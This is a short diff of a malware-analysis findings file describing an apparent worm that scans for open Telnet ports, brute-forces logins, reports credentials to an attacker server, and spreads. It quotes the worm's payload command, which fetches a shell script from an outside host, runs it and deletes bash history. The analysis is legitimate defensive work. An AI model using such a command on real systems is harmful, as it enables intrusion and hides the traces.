covelo12/Findings-ER/Findings.md

 - This is a scanner for open Telnet ports in the network, it scans the network for Telnet and then tries to brute force them.
 - When it's successful it sends to the attacker's server the information (IP, port, username, and password)
 - Then it sends the following payload to the connected machines "cd /tmp;busybox curl 192.168.160.143/a.sh; chmod 777; sh a.sh;rm -rf ~/.bash_history"
-We tried to curl the a.sh but we just got this:
+We tried to curl the a.sh but we just got this: \
 ![alt text](img/ash.png)
+\
-So we concluded that is once again the initial script in ansibled or something similar, concluding that this is some kind of worm.
+So it was concluded that is once again the initial script in ansibled or something similar, concluding that this is some kind of worm.

 ##### How it works